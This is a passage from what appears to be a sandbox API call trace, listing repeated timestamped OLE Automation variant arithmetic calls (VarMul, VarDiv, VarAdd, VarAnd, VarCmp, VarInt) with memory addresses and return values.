pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.448] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.448] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.448] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.448] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.448] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.448] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.449] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.449] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.449] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.449] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.449] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.449] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.449] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.449] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.449] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.449] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.449] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.449] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.449] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.449] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.449] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.449] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.449] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.449] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.449] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.449] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.449] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.449] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.449] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.449] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.449] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.449] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.449] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.449] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.449] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.449] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.450] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.450] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.450] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.450] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.450] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.450] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.450] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.450] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.450] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.450] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.450] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.450] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.450] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.450] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.450] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.450] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.450] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.450] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.450] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.450] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.450] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.450] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.450] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.450] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.450] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.450] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.450] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.451] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.451] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.451] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.451] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.451] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.451] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.451] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.451] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.451] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.451] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.451] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.451] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.451] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.451] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.451] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.451] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.451] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.451] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.451] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.451] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.451] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.451] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.451] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.451] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.451] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.451] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.451] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.451] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.451] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.451] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.451] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.452] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.452] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.452] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.452] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.452] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.452] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.452] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.452] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.452] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.452] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.452] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.452] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.452] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.452] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.452] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.452] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.452] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.452] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.452] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.452] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.452] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.452] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.452] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.452] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.452] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.452] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.452] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.452] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.452] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.452] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.453] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.453] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.453] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.453] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.453] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.453] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.453] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.453] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.453] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.453] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.453] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.453] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.453] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.453] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.453] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.453] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.453] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.453] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.453] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.453] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.453] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.453] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.453] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.453] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.453] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.453] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.453] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.453] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.453] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.453] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.454] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.454] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.454] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.454] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.454] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.454] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.454] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.454] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.454] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.454] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.454] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.454] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.455] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.455] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] 